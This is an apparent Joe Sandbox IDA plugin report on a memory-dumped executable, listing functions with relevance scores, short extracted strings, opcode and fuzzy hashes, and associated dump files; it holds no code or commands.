Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: AC$"o i$#O3I$$S#]$&+$*$+C6M$+W*Q$-_+Y$/$$5G(A$<[ae$A3C=$CsA}$GwKq$H7B1$I?Z9$SQ$W@$XkVu$Yg_a$\2$_c/m$h;HE$r1`3$xy$y+U5
API String ID: 0-3402895583
Opcode ID: 3a5a24f2e0e4e4ca7bd231b30c61803dfa2e48b4a9341dedd6898297a6f0f24d
Instruction ID: efba3d3fe163cae04db539cb27c2b640f7c211d5561d10488ac90e94a1e5495b
Opcode Fuzzy Hash: 3a5a24f2e0e4e4ca7bd231b30c61803dfa2e48b4a9341dedd6898297a6f0f24d
Instruction Fuzzy Hash: 8C42D7B450D3858AE374CF129481BDFBBE2BB92304F508A1DD6EA6B255DB704186CF93

Function 00A9A1C0 Relevance: 10.4, Strings: 8, Instructions: 402COMMON

Download Yara Rule

Strings

W+U0, xrefs: 00A9A2D4
LH>N, xrefs: 00A9A2EC
^'U[, xrefs: 00A9A2BC
>, xrefs: 00A9A37E
cmj., xrefs: 00A9A1E6
(, xrefs: 00A9A27D
-++(, xrefs: 00A9A2CC
fG, xrefs: 00A9A324

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: ($-++($>$LH>N$W+U0$^'U[$cmj.$fG
API String ID: 0-3233654006
Opcode ID: 5e6bdec4ac60a2a2cb09132af775e15d63ff9971446b651b6d4483e353406e3b
Instruction ID: 99da1efae84c669a025351531503261e9086b9f04cae6314dd197c66f4a3c71d
Opcode Fuzzy Hash: 5e6bdec4ac60a2a2cb09132af775e15d63ff9971446b651b6d4483e353406e3b
Instruction Fuzzy Hash: AFB1C37124C3D14BD7268F2994A036BBFE1AFE7304F18496DE4D54B382D379884ACB92

Function 00C6521A Relevance: 7.8, Strings: 5, Instructions: 1600COMMON

Download Yara Rule

Strings

Kqc, xrefs: 00C65258
.D_, xrefs: 00C658A2
O8y, xrefs: 00C65A5C
o~`y, xrefs: 00C65B42
o~`y, xrefs: 00C65B57

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: .D_$Kqc$O8y$o~`y$o~`y
API String ID: 0-3208989491
Opcode ID: 916b505327f0c8ddd0b992a10302688d1bf3b1e6775172c993b4b2e292efb591
Instruction ID: 24d36bf11bff6b95436dec2369ed7a1b5debcaefe004d73689dc724c313845b1
Opcode Fuzzy Hash: 916b505327f0c8ddd0b992a10302688d1bf3b1e6775172c993b4b2e292efb591
Instruction Fuzzy Hash: 0AB2F6F360C200AFE304AE2DEC8567AB7E9EF94720F16893DE6C5C7744E63598058697

Function 00B84330 Relevance: 5.5, Strings: 4, Instructions: 543COMMON

Download Yara Rule

Strings

)CN, xrefs: 00B84906
{-w{, xrefs: 00B84973
X{+, xrefs: 00B84880
l h3, xrefs: 00B848FD

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: )CN$l h3${-w{$X{+
API String ID: 0-668776713
Opcode ID: f19170b5156b6a672bad21d150e3816f648c01cd12ea32ed554f80ac1d78bf48
Instruction ID: 07e9d828005b084102276658a59610a341e8a8b96d83865cb6bc19961782b524
Opcode Fuzzy Hash: f19170b5156b6a672bad21d150e3816f648c01cd12ea32ed554f80ac1d78bf48
Instruction Fuzzy Hash: 5102F0F3F152244BF3845D38DD983667686DB94320F2B423C9E98AB7C5D97E8D054385

Function 00B3F1C6 Relevance: 4.3, Strings: 3, Instructions: 566COMMON

Download Yara Rule

Strings

Ckw>, xrefs: 00B3F725
6U>{, xrefs: 00B3F9A4
N4S, xrefs: 00B3F840

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: 6U>{$Ckw>$N4S
API String ID: 0-240463976
Opcode ID: c70f1ae813c4f3ef27c48897a4635704dfdedbde1983c012d74df87a1ee0bf76
Instruction ID: e8c3e3d6b5735fec0fbf0a8ecf38f2ae757f29469c315117f1a813f6b0a87c44
Opcode Fuzzy Hash: c70f1ae813c4f3ef27c48897a4635704dfdedbde1983c012d74df87a1ee0bf76
Instruction Fuzzy Hash: 9502E3F3E156204BF3584939DD88366B6929BD4320F2F823D9E9CA7BC9D87E4C0942C5

Function 00A92170 Relevance: 4.0, Strings: 3, Instructions: 237COMMON

Download Yara Rule

Strings

", xrefs: 00A9217B
u, xrefs: 00A92333
\, xrefs: 00A92329

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: "$\$u
API String ID: 0-3864133841
Opcode ID: a7aa6638435f8b4da8ca445797ef39829e50f7005d1458100224cbcfb4891357
Instruction ID: e1da2decb9b0c48efe6865ce47147bb33a1020f9e967be11533330b8463a038b
Opcode Fuzzy Hash: a7aa6638435f8b4da8ca445797ef39829e50f7005d1458100224cbcfb4891357
Instruction Fuzzy Hash: 53711772B08281AFDF158F6C88403AA7FE29FD6310F28857DD8D68B292D674D945C792

Function 00AA51D8 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

eu, xrefs: 00AA901B
2j, xrefs: 00AA9026
hn, xrefs: 00AA9031

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: 2j$eu$hn
API String ID: 0-107825706
Opcode ID: dfcc00435a67c0e16bd50ad0b19b8ca88d68ae0432bd949662e355fb8216ab7b
Instruction ID: 2a58c340c46ed97247af55519fd19bbc24edc73196b622b411d871fd7bf0145b
Opcode Fuzzy Hash: dfcc00435a67c0e16bd50ad0b19b8ca88d68ae0432bd949662e355fb8216ab7b
Instruction Fuzzy Hash: 7F410E752093818BC7318F28C4557EBB7F1EFE2350F198A5DE4CA8B291EB784841CB52

Function 00B9D066 Relevance: 3.0, Strings: 2, Instructions: 508COMMON

Download Yara Rule

Strings

6G(, xrefs: 00B9D64C
spu, xrefs: 00B9D75C

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: 6G($spu
API String ID: 0-3390557401
Opcode ID: 84668af1f641adbb23e70e5c716a4f260d7b83d24c051fa5170db6798e42eef5
Instruction ID: 50afbfec1a9a39357ef4b6dc83278447f22925d3b189d59934f4a4484efb40d9
Opcode Fuzzy Hash: 84668af1f641adbb23e70e5c716a4f260d7b83d24c051fa5170db6798e42eef5
Instruction Fuzzy Hash: ADF1BDF3E116254BF3444939DD883A27693DBD4324F2F82388F58AB7C9D97E5C0A4284

Function 00BD2381 Relevance: 2.7, Strings: 2, Instructions: 223COMMON

Download Yara Rule

Strings

\, xrefs: 00BD23FD
7Tj!, xrefs: 00BD2396

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: 7Tj!$\
API String ID: 0-2601465972
Opcode ID: aef8aa7c8236eed4927b7026a10582f3d93e39ecbcbc29e1dc4d69cf3dc774a5
Instruction ID: 9accdd2b884f2f0a1469a865ae8e97a327aafd2696e4f02f8342ded9afb7eb35
Opcode Fuzzy Hash: aef8aa7c8236eed4927b7026a10582f3d93e39ecbcbc29e1dc4d69cf3dc774a5
Instruction Fuzzy Hash: 907168B3F112244BF3944939CD5836276939B95314F2E82788F58ABBCAD87E9D095288

Function 00A9E218 Relevance: 2.7, Strings: 2, Instructions: 158COMMON

Download Yara Rule

Strings

`86, xrefs: 00A9E41A
2, xrefs: 00A9E222

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: 2$`86
API String ID: 0-3729967060
Opcode ID: 7de7c677f392d9ed270820d0e49e90dd3a3e7cda31a98bf6ebdfaba554a523f5
Instruction ID: 777d1824940499991262c36bec68630a69d4d4c83b13374a77ebaf45c8b34960
Opcode Fuzzy Hash: 7de7c677f392d9ed270820d0e49e90dd3a3e7cda31a98bf6ebdfaba554a523f5
Instruction Fuzzy Hash: D3518D716983838BDB34CF2998A5BABBBE1EFD5304F18893DD49987643E73044059B52

Function 00ACF1D0 Relevance: 1.9, Strings: 1, Instructions: 689COMMON

Download Yara Rule

Strings

|~r, xrefs: 00ACF85C

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: |~r
API String ID: 0-2030294058
Opcode ID: ce77eefe0bf3df0b59071afd0a290551b9a53b4b8b1001778565a2a859bd56a8
Instruction ID: 7c1239f36ecef4caa6cbd4a825d02822d85a3066e30563c35f8dd96156bdb06a
Opcode Fuzzy Hash: ce77eefe0bf3df0b59071afd0a290551b9a53b4b8b1001778565a2a859bd56a8
Instruction Fuzzy Hash: 70220136A09211CFC704CF68D8917AAB3E2FB99314F0A857ED98697351D335ED46CB82

Function 00ACF3C0 Relevance: 1.9, Strings: 1, Instructions: 645COMMON

Download Yara Rule

Strings

|~r, xrefs: 00ACF85C

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: |~r
API String ID: 0-2030294058
Opcode ID: c61d7ad57553f6426027255f588374a573a44556f4d6f7c824b21fe31b73f406
Instruction ID: a432f3499a52b5309d7a74e85e701f01237a44c4cce991205047a1cfb53062aa
Opcode Fuzzy Hash: c61d7ad57553f6426027255f588374a573a44556f4d6f7c824b21fe31b73f406
Instruction Fuzzy Hash: B6120236A09221CFC704CF68D8917AAB7E2FB99314F0A857ED896D7351D3399D428B81

Function 00ACF2E0 Relevance: 1.9, Strings: 1, Instructions: 631COMMON

Download Yara Rule

Strings

|~r, xrefs: 00ACF85C

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: |~r
API String ID: 0-2030294058
Opcode ID: a371f5e4100979773fa31a3301d194047d860dddb3d55448877a6b1e439c0fc6
Instruction ID: 8b5f26dc45424288217c1fe9e59b7411ff4ddaa417653ff2b55d4e9ea53b7780
Opcode Fuzzy Hash: a371f5e4100979773fa31a3301d194047d860dddb3d55448877a6b1e439c0fc6
Instruction Fuzzy Hash: B012FF36A09211CFC704CF69D8906AAB7E2FB99314F0A857ED88AD7351D3359D46CB82

Function 00BB0035 Relevance: 1.8, Strings: 1, Instructions: 526COMMON

Download Yara Rule

Strings

B, xrefs: 00BB0248

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: B
API String ID: 0-1255198513
Opcode ID: 174b857e3a60abf841d2451b4e5fc790bdd18ae8d8d1dc68ad1da39887dd1df2
Instruction ID: 4ca0a3d47fd4e77997c1495714bb1389760f3efc1b8fafd5a1382492d8211b94
Opcode Fuzzy Hash: 174b857e3a60abf841d2451b4e5fc790bdd18ae8d8d1dc68ad1da39887dd1df2
Instruction Fuzzy Hash: ECF1E1B3F102254BF3545D38DD893A6B686DB94320F2F823C9E589BBC5E97E9D094281

Function 00B25264 Relevance: 1.8, Strings: 1, Instructions: 506COMMON

Download Yara Rule

Strings

/], xrefs: 00B25916

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
